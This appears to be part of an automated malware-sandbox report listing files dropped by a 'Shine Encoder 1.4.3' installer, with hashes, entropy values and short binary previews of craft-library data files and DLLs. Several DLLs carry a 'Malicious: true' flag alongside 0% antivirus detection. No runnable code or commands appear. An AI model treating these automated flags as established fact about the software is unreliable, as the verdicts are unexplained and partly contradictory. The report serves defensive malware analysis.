C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-B9EB4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	76044
Entropy (8bit):	7.781593198930996
Encrypted:	false
SSDEEP:	1536:9zCUsvuDmEm7KAaAJB2x56SPCwlkmsKpUaYVRMguAIXSA2:9z/s2Vm7KAajfl/sKpUaYVRM8YSf
MD5:	FA20A58E0C27D4DED87150AADDBB2556
SHA1:	74CF094D22A5806FD0DF01701851309CA3D3F263
SHA-256:	A047FE59A6C64A6C17B887934245E64DAB2CDA4925B259456596C2C597740D75
SHA-512:	3E1C65AD1FB8728724FEFCB8601918BEABCFBF4DC31AE17BC5BAD66BFA32DB184950AC077B0B27AE399A4B3A6B5890AAB325805F4444CDF07C4D216B7FDA4EDD
Malicious:	false
Reputation:	unknown
Preview:	BSCAL............................................l........"#........;.......iY........h..b....gz...........S....r...'.............p........=...^.............D...N........z...DSCAL..............................{.I..T.......\..?....;....X.+$g.=.7\|5..G.N..X....v.eo.@.[...9.>E.Y{..}[......w!j+..vy.8.p...w..&......I..B..s.W..\.G..f........../..../........Newborn.Craft Edge.Baby..........:.....:@...`...............................DSCAL..............................}.r..@.1.R...1H...Ul.A.k......~...l.[.J:E.X.".d(6J......r..P....X.....I.j,.72Gcd$......>Xd.y,.[.e..zP`..$I......g5x..MhG.........................Bottle.Craft Edge.Baby..........:.....:. ..`.g.......Bottle.d.d.S....PNG........IHDR...d...d.....p.T....bKGD..............IDATx...Kh.k...'1..I.1......QIM.X.."n,......U(RQhA..........Ru./XKI..N5.....g!...j&.s.~.N2....\.!.""..G....d2x....`.m.a....=@%..;.......btt....8~...C.u..Mjmm....o?......&.u...*.. .iR4.......d(.......\|.z..%. ....(.J..^.ze.X.p

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-CMSN0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	595545
Entropy (8bit):	7.0713050562667386
Encrypted:	false
SSDEEP:	12288:fTBZLFkAEYvIfNLmu2cTbZqSNTuh4kMjBUJ84Ch9ycd8sl:f7LgLF2cbZtNT+sjOJXCrgsl
MD5:	3695D419AA9C7B11C464BE2A58A40530
SHA1:	C73513DF0555DB421EF81EF436136E53CCF4EE11
SHA-256:	0487C6C64C185AC5BF459A907F302E363E5A162081B651570E691B3EA07818DD
SHA-512:	54883F5E76E2208856F07DC16C9E5BCEA3ACBDA7C4B9CE48BF043CC371AD57F2925DCB6360CA85F5725609FC692906546B6E5BF70D8F839A206E06316C9E2F59
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................2......H....(...........w....r...&?........E...cI...2....\|...D........!................."....#...)....M...2............c....-........"........X...JW..........4........+........n...BQ..."....s...5...U...5/........@...8....M....f...2.......d...a........1....+...3...j'....D...,...Kq.../...(....!.......b....H...~.........-...u<.......{R..r.....j..@....-....B........*......../...."..\$....G........`..].....y...(.......5............k... "...........DSCAL..........................@......d33....^m...n-.C0O.i.!w.2G.,.".).22...S...V.P...~).......PJ...._..q..7.4..l...}.........^M.rY......".L..+...\|.X.....)...i..B...+~i..s.82.X........x.9..(M..L.........J....J........MichelleMyBelle Creations.Craft Edge.Miscellaneous..........;.....;B...`...............................DSCAL..........................@...c..#33....^m...n-.C0O.i.!w.2G.,.".).22.F..`m`..XJh9u..pFdCp%.R..9z.n...Qe.. 3.{,"....,`.9.+.5.D........vr..72#..s.U.y"[.6...h.3M. 2O..x.f.Ah.`.L.9...

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-FM7GT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	96301
Entropy (8bit):	7.809129886497833
Encrypted:	false
SSDEEP:	1536:dINDJFcDGljnsSvjgSyRFLcqIqE+yh319vpvKA9Z4CPOSLbnBKoIytnR2kJ7dm:iRcCBbv0SyRFByd3vFKCGSXBKTyLRdm
MD5:	E82C623CE1F741A9F4FDE9DC43F23630
SHA1:	C2E84F76BFC81C1789AE7BB6AEE197E186774697
SHA-256:	05D668F5C491AA51C7DA93862D3E3C5843A27631BBD1C0EF8034B94080D6CE00
SHA-512:	6B51E4BE629BA85CA583A703700FD2CBFD43734BB29433BA4453CA068B767AB05B1F4084C71B22D6BF11D0B5CA73B9F4FF61A32436BA1A62CA465F1005847109
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................................1........K....A!........1........@........O.......H`..?.....o...........d....p...........\|....k.... ........>....,........L.......Ig......DSCAL...............................x..SA.{..s.g......9g]5.jB.HY.CslP...?.g(.. S/..K9#.....w\S..$M\|vX.zKw/.Fl.`.`.c_=..q.......\|.^a...kEX<....=..H!..t.....+.W...........2....2........Weather.Craft Edge.Weather..........;.....;....`...............................DSCAL...............................$...s....o..IsD.).8.$.LD&.,.').....,..,.x........J......I[...P..\.q...K:.}Y....... v%..........?.n.\........L.g..2c..........1....1...C....Bolt 2.Craft Edge.Weather..........;.....;.$..`.........Bolt 2.d.d......PNG........IHDR...d...d.....p.T....bKGD.............CIDATx..{PT...(.{..q`.].EY....-...F.........Tk........F.m2...P.....'"7Q...H...#..6....\....F.\v...U>3........<..s.s.N$.>.~R.p.RRRD[V..N0..:u2...p...Q..'.....1e.D\|.m.m{.^^^.,.o..0yyy.={...+1v.(.>..prr.e.}=.'\|..1L...E.*..

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-GKKIA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	132558
Entropy (8bit):	7.669771822889911
Encrypted:	false
SSDEEP:	3072:aqP0FOHIgQ/1E8d9ko/te/O+MFgriBmVdQIKgaKKHEZkiIZR1WjA/sBf:3P+Oogc1EyO8t4LMFgri0/3EPnIsEf
MD5:	E6497DA72921573C22D29C664B5C1EAA
SHA1:	5D2F7BBC3E94BDCA08B9DABBE47CB4762024FCB8
SHA-256:	17BB9F3422F532DDFE5D6C9602E9E49BE765E4848ACA1C191CF0484B0092AB59
SHA-512:	1090C1B1D4005725DF62A20D8D4D68E0B561E7A285104CBD99F42E16A170A1BA8A2452F05162212D05683264104DEE3F504C90CE38033A393E92B62427397562
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................................f....h........3...a.....2.......}F..f.....T........f..X....)t...........................S........L....8...Y!........'....8..h$....]........r.......u...#........_........x....o........Q...V........'...DSCAL.................................6.I6{..tr....W....zY..2y..?>..4.....'...o.h.]..:....)f..c>t.<.....]..M..H..R...\..S?P..[....u.~..+ ..B.HR.....N....@..U.i..........0....0........Swirls.Craft Edge.Shapes..........:.....:.6..`...............................DSCAL..............................ix.0.X]..Sv..5....k.#.m\|i.7..9.@q...:..``.=...p...0..8....n.q...@..cTgu...q_&...ib.q..O~\...S..........[a/S.E."...B\.....N............7....7...r....Flourish Sm 1.Craft Edge.Shapes..........:.....:....`.Q.......Flourish Sm 1.d.d.6....PNG........IHDR...d...d.....p.T....bKGD..............IDATx..MHT]....C..VcX.Z...A.$..."k....A.B...}P.F...X$4ML..I..h..?.0....%3S.?...y..s.:....}.....s...?.8..9.suDD..0,....5.......W...#.(.B..p8(*.....{..

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-HCHJH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, maximum point enabled, calibration: offset 0.000000, slope 670.488708
Category:	dropped
Size (bytes):	77426
Entropy (8bit):	7.644517291394499
Encrypted:	false
SSDEEP:	1536:3tRKxIbZjmpsrGj6q+RZFHMqxU9pSKi2RWscqh8Pi7Bs:3tR9bZycVlxzKnv78Pi7a
MD5:	39DC4CE3E509EE530E2EC97E03E227D6
SHA1:	E60B00E89197208BE2D9CF8F3C6C8661FBDEAED1
SHA-256:	5296290ACDD86B7DABEAFABC26D0EF6FDD1A8DD9EA2914F036B94D0AD115B973
SHA-512:	39711AE42F87C3E3B0E17A8378EFE05C416BA4D1895FF6F6E718B384D5C7699C318FF36CF420DCD480094EABCD9F07672ECB1FE3F4A3E64E8EF6C6450A010BD8
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.....................p..................!...`#..[.....1... ...yR.......Ya.......0{..........\|....j.... ........ .......&....B...07..DSCAL.................................QqI.;.`.....h...'I.T.C.:...L.;..F..U......k=R.iW...O.!..YY.P.0..p..c.........P...z..BWn ..q..{V....m....q%.I....?...C...........7....7........Winter.Craft Edge.Miscellaneous..........;.....;....`...............................DSCAL..............................,..)K.9......Z..3..-.R(.>..dq.............\|n=r]M?.O!v...2..4.A..$...<'j...U..N.Wlm0.d...m..Z.B<?.f..GD,I..8..S.........\.@rt..........@....@.... ...Gingerbread Man.Craft Edge.Miscellaneous..........;.....;."..`.e.......Gingerbread Man.d.d.H....PNG........IHDR...d...d.....p.T....bKGD..............IDATx..y\|.....3{%....IHB.H.g#..?.". ..V..?....Z.R<....`+"".....!}!^(.@...!!..9..v.....H......dwk}...\3..~..g.EQ.~.g.z...b.Z................ *...T........K.=.#.)++.w....O.=.GD.?a..z.....Zl...V..&...3u..n..w$$$x..\G...k..<..Br..I..H......\

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-MFRK8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	92038
Entropy (8bit):	7.7200406826946235
Encrypted:	false
SSDEEP:	1536:ca4Jw4jmV7T35O0vMSndbJMZSMSU514ph64P8beNFbWmGINBU0Od:ca2bmh35rkmrU5f4P8beNhhG0rM
MD5:	E98226F38153CFBF93BF77744E364434
SHA1:	6E613678B12144ADAA5ADCC18AA40965EB903101
SHA-256:	825F3BA18ABDFA2164FBC1D183D8C1C178C9D99C3C4B694AC358D833A755D241
SHA-512:	228B1334D11F455EC6610DB53E36BCC2D747975EB5E8D650D41C92FD856A34E266ACE5A8A094FCE407E518EF76B6E0B00C983A0CDCE2B930B2222E16A4B6A5CD
Malicious:	false
Reputation:	unknown
Preview:	BSCAL...................................................../+.......'G..\.....]..9.....s..~....:...^.........!.......X%.......7....4....!........?...qX......DSCAL..............................jy.l.j.;.\o..`P..a...c._.u.`....Gm2)T....^........$y..V............2....b&..?o....u.9...*.Zj.VT.J....h.C....!..B..jE..GP+.ewI.........0....0........Spring.Craft Edge.Shapes..........:.....:`c..`...............................DSCAL................................Q].........y....n%.3.Q.ky......{.`.P-P%.p..-TjNI..{-92...Y./.....N...!D...g....r.84X...M.....2h...b.^l.0P......}c...(...............7....7........3 Leaf Clover.Craft Edge.Shapes..........:.....:!T..`.f.......3 Leaf Clover.d.d.K....PNG........IHDR...d...d.....p.T....bKGD..............IDATx..yX....?......3 ..z..j.".Rn.1-}.....Y.Y..R..-TvR,.5....4M%....f....I.......f.af...\|}K...a.>.....}...\|.^..I.A.h.o.6..-...A...A..yc;..7n.`.-l......^..dA......&..P....?0l.0.....e..4.N=''.7?x.C....-C.C..(@r+..(....k...S.23m&....34

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-MK3UJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	543833
Entropy (8bit):	7.50496335178111
Encrypted:	false
SSDEEP:	6144:9DQ1236dLlSmlgZOw9/+wdM0zOyJromlIK1Z7HsH1GpYMnhdjYnDf67:dx6dLk/xSc+6sV8YIhdkDf67
MD5:	7D692438B7E70DE932BC386A3D44D319
SHA1:	5FC91DF8EA79A005A8583DCF44E0D48B7EC5A90F
SHA-256:	05CB2D622DDEED62E052B8BBDB19DBE99B83F44F4447408601823B518D330586
SHA-512:	1A605B25724B91BE5802104BC8BAA0C4EB0A3638CFD84D8AECFF10FC41B72BFD44DDD8DA34373C1BB8B7C8D4823D222441E0CFAF9696B8F119F8BEA37ED9724D
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................4......D....6........'...j0....H..b........x....k........T...G%....9..}0....j...........]....r...N..................2...x...#............./...:9...iJ...F............k........d...z................-.................d...."............S....%...........................)..=.....7........B..@.....]........o..E....;....A...+...09...[....2..../..y....];........J.......WX........e........r......._...2........L........'.......=k....<..o^........Q.......<........A........r..DSCAL........@a"-..............@......v33....^m...n-.C0O.i.!w.2G.,.".).22.....N%....;.b7.P....G...1.u...iD..........A...[ys.@..zX.m.j.Y~....y...K<....n.l.......L...P..=......@...@.A4...t.@"..z..........F....F........Createinspain Designs.Craft Edge.Miscellaneous..........4.....4....`...............................DSCAL..........................@.....r33....^m...n-.C0O.i.!w.2G.,.".).22.,"...~u..@....7.p.m.Q.&?@..d.>........ <"..-.`2@...aM.....+,..<........Sm.9....C.O.5p.Q..c....

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-NR804.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	44241
Entropy (8bit):	7.747233988337866
Encrypted:	false
SSDEEP:	768:tZh3JPKW648iSo736Az5jwwcFuyZ3Y1Lnhe5xaLZPTAXogkA1sywv6:thPKz4/7h6fZ3Y1LhqxaB0Xrkosfv6
MD5:	561A63F0CD4A70F3134143A5E266E58D
SHA1:	18F871AE3532B1F9A030EBF2EEE7AA7A4491D60C
SHA-256:	7C1B0B11EBF37D03AE2F6CF5135593D604BC1D3BF942329A3952DC0CCB770769
SHA-512:	52F15AE1794120CA3E7E6204A4AEC9364BB8EBF7BF446753C53E8B5232BD7F76114603DABF41562318903EBEBB5390CDC4E651CDB33350AC5F3C0BDEDBBE3594
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.....................g........,.............Q........0........(,.......19........B..C.....W........_........t..Y$...'.......DSCAL..........................@...Ps..33....^m...n-.C0O.i.!w.2G.,.".).22.4....Q....<.^..]e..!..G`......E..B..,..O..ev.b.....j P[Oc. ?1o65.O..r.dp.X.....7..OB...p.Q..pU....e<...4X.H...uU4J?.........................Music.Craft Edge.Music.................0'..`...............................DSCAL........`.................@....:.<33....^m...n-.C0O.i.!w.2G.,.".).22.P...A....^.M._.Z.vpMD<.Z.i+..\:.v......."...o...E.5..W.......M).....@.....K....~.t(.y...T.S......6~..hx..~w.=..d.3'.............4....4........Double Note.Craft Edge.Music................. ...`.........Double Note.d.d......PNG........IHDR...d...d.....p.T....bKGD..............IDATx..ML....}..v.n.Xy..iS..h<j8.1x.111.x0^L..M.zQ.&..$....1..'.....H./@)..R.ei;...o.R...:...v..<;...4.Q.B...-u....p..`..`..@....p.\+.cB..,................ ...099.o...8.<.B...(^.x.....e1!.J.099.@ .@ .`0

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-NVVL7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	56223
Entropy (8bit):	7.675938408908281
Encrypted:	false
SSDEEP:	1536:/+jsHu4IMEuSznazX2TQZwm+WxhM6HMy6Z7:/ppIMEulGTuwmXhMwMB
MD5:	619CA288DE840F0BEC52218DB7F2036C
SHA1:	D1D5389AAE91284734F4940BD8319CFA2BC40A0D
SHA-256:	C2A6D78B635CA45E316D10936EF7507B1643F4674BAA08B79FE22285EADC3966
SHA-512:	4FACBC40E37F9801E9177A057D55BF236C5FBCE5397AF973B60B21C027AB258FD1A91B893F93AE3100A6785AD67089FBF623C121B7D4990A987A311E47314E5C
Malicious:	false
Reputation:	unknown
Preview:	BSCAL...............)...............................................$..G..............4........=.......~L..`.....U........n........y.......T............O....W...%....\|...b............z................DSCAL...............................\|.1..%.[.B=l.8....I9s\QP2..?..U.G....."....7..[d.b...6.,J]./;[.{T....*bV....$G.M......../T..5y............w.5.y...N...:.,.y..k.........0....0........Arrows.Craft Edge.Shapes..........8.....8"...`...............................DSCAL................................ u..d[........P.[..Y5eD..w..s.5~.._.Ev\.,o...E.......}5..3J..6.6E<W\|.....6.[..s..... .@zc.X.f....I.........R.f..x.T.....A.........1....1..."....Arrow 1.Craft Edge.Shapes..........8.....8....`.........Arrow 1.d.d......PNG........IHDR...d...d.....p.T....bKGD.............AIDATx...KHT{....c.$......l..g(...DP..4.@#h.Zd.,.!Y..R8.P..&.EFa..I.E....K."....t..v.v.uG...2.....A_..9z,B.4....Po@\|O.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(&,...v.......C..Phii....7o.P[[..h......

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\WinSparkle.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	6.575328533778386
Encrypted:	false
SSDEEP:	24576:JjNy0cphFIlPXI9RTczazoP2l0iS65WQ1jGb8JcBCu98xvtQ/U:JY0MhO+louaizR1jGb8iBCu98xvtQ/U
MD5:	21CF2233F94BF81E22737E2CAE984FD1
SHA1:	428951E7391B7CFCA62624C11E24B361CAD9D2E0
SHA-256:	FCB2DC122AD93E88AA07B99DB1292CF5B8F04F7F5125C7A9AD98E8790E0F7366
SHA-512:	F033174BB79D1F0E9D23FBE983A5D5849AE7CC99BA52D7CB5480F55F25CDDAE0EADE184FBF7DF970DE39B6FA315A049A13234D8379C72DC5AE2E8DDBABA13772
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t6.&0W.u0W.u0W.u9/\|u.W.u9/mu.W.u9/ju.W.u...u:W.u...u'W.u0W.u.V.u9/cu.W.u9/{u1W.u..}u1W.u9/xu1W.uRich0W.u........................PE..L......T...........!.........N...............0...............................P.......c....@..........................b.......B...........1......................./..pq..................................@............0...............................text... ........................... ..`.rdata...5...0...6... ..............@..@.data...\....p...l...V..............@....rsrc....1.......2..................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\cairogfx.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1305600
Entropy (8bit):	6.804982979697153
Encrypted:	false
SSDEEP:	24576:emdh6XRecOlYMksUqYMSMvm+YNqwngZRa5R+joLzydTEfCSoIkNyi220BTpdAd:emdhnc3lgZRa7+jo6YR8eXBT3Ad
MD5:	6330B1294C40518F7C6363F97338A0A9
SHA1:	350E07281719E55659F74884387FA072C0D53F52
SHA-256:	4D100667AD119AD52D1172173C97EB9EC30B7C378070DFD2D07A2A04767B4D86
SHA-512:	97E1D71881663496011E5B3D70E817D62EB39CD484CB091A633D6329BFF2900029B04D0086358A522C3BFDA187FC7AEBEEDACC16003FCD2937DF047A89D4E54F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.3.:.].:.].:.].7.....].7.....].7....]..3..3.].:.\..].G....].G...;.].7...;.].G...;.].Rich:.].........................PE..L....g.`...........!.................o.......................................P............@.........................p3.../...c..d................................w..................................P...@............................................text...@........................... ..`.rdata..............................@..@.data....8...p.......Z..............@....tls....)............p..............@....rsrc................r..............@..@.reloc...w.......x...t..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-1GO4T.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-AF5PH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	6.414789978441117
Encrypted:	false
SSDEEP:	12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
MD5:	561FA2ABB31DFA8FAB762145F81667C2
SHA1:	C8CCB04EEDAC821A13FAE314A2435192860C72B8
SHA-256:	DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
SHA-512:	7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:\|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-B7T63.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	6.575328533778386
Encrypted:	false
SSDEEP:	24576:JjNy0cphFIlPXI9RTczazoP2l0iS65WQ1jGb8JcBCu98xvtQ/U:JY0MhO+louaizR1jGb8iBCu98xvtQ/U
MD5:	21CF2233F94BF81E22737E2CAE984FD1
SHA1:	428951E7391B7CFCA62624C11E24B361CAD9D2E0
SHA-256:	FCB2DC122AD93E88AA07B99DB1292CF5B8F04F7F5125C7A9AD98E8790E0F7366
SHA-512:	F033174BB79D1F0E9D23FBE983A5D5849AE7CC99BA52D7CB5480F55F25CDDAE0EADE184FBF7DF970DE39B6FA315A049A13234D8379C72DC5AE2E8DDBABA13772
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t6.&0W.u0W.u0W.u9/\|u.W.u9/mu.W.u9/ju.W.u...u:W.u...u'W.u0W.u.V.u9/cu.W.u9/{u1W.u..}u1W.u9/xu1W.uRich0W.u........................PE..L......T...........!.........N...............0...............................P.......c....@..........................b.......B...........1......................./..pq..................................@............0...............................text... ........................... ..`.rdata...5...0...6... ..............@..@.data...\....p...l...V..............@....rsrc....1.......2..................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-H7GRO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1305600
Entropy (8bit):	6.804982979697153
Encrypted:	false
SSDEEP:	24576:emdh6XRecOlYMksUqYMSMvm+YNqwngZRa5R+joLzydTEfCSoIkNyi220BTpdAd:emdhnc3lgZRa7+jo6YR8eXBT3Ad
MD5:	6330B1294C40518F7C6363F97338A0A9
SHA1:	350E07281719E55659F74884387FA072C0D53F52
SHA-256:	4D100667AD119AD52D1172173C97EB9EC30B7C378070DFD2D07A2A04767B4D86
SHA-512:	97E1D71881663496011E5B3D70E817D62EB39CD484CB091A633D6329BFF2900029B04D0086358A522C3BFDA187FC7AEBEEDACC16003FCD2937DF047A89D4E54F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.3.:.].:.].:.].7.....].7.....].7....]..3..3.].:.\..].G....].G...;.].7...;.].G...;.].Rich:.].........................PE..L....g.`...........!.................o.......................................P............@.........................p3.../...c..d................................w..................................P...@............................................text...@........................... ..`.rdata..............................@..@.data....8...p.......Z..............@....tls....)............p..............@....rsrc................r..............@..@.reloc...w.......x...t..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-KP5GU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	3766874
Entropy (8bit):	6.577509385099561
Encrypted:	false
SSDEEP:	49152:KQeEr1e0ZaFnh+k7jsIJT/Kw0TA9CcvD7irKV3JV7Dzy:KQeExTIFJTV0TAccvD7imV5tzy
MD5:	6807AD5188FC42DD109952A93E555012
SHA1:	E3333FDC99D0380A154B382BA8AF7536BF6E99A5
SHA-256:	DA13653EB7739BD622A42E658F3B06230E97C9DDF0C731088CA2781CBBCCE4F9
SHA-512:	98215383B2207F0EA1B0C296B272DC4A05EAD6D513D4152ECE6FE07B8297EA9575A67EAD125B3AB4447653F8346F9DB0C74D34CD24B97946B5E3A504D6B14335
Malicious:	false
Reputation:	unknown
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..L............................8.............@...........................9......c:.................................................P...............................................................................4............................text............................... ..`.rdata..T...........................@..@.data....c...0...0..................@....rsrc................<..............@..@.pqr7....$......Z"...X..............`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-QVTBC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.542655141037356
Encrypted:	false
SSDEEP:	6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
MD5:	86F1895AE8C5E8B17D99ECE768A70732
SHA1:	D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
SHA-256:	8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
SHA-512:	3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4\|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-RGF1U.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15864
Entropy (8bit):	5.446150628226878
Encrypted:	false
SSDEEP:	384:zVQEjoZ7ooLzDCccymQx/9DSpNAJemtjf0Ncl08:zV1joxLH1SpKJtTF08
MD5:	43F2BC6828B177477C2F98B8973460E8
SHA1:	F0A3C975346AF66A843E8B49574DC9083CD32E02
SHA-256:	3B578B15AD0D0747E8A3D958A0E7BF1FF6D5C335B8894FF7A020604DA008D79D
SHA-512:	2449C3D615E5BCECE4C1B773FE629A75061A3E1488F6D3D743D7D209F1D687F26997937AB13B3A1B89B650D122DB030D2188E1E89BC1AB03CF2DF9A29CAA456C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
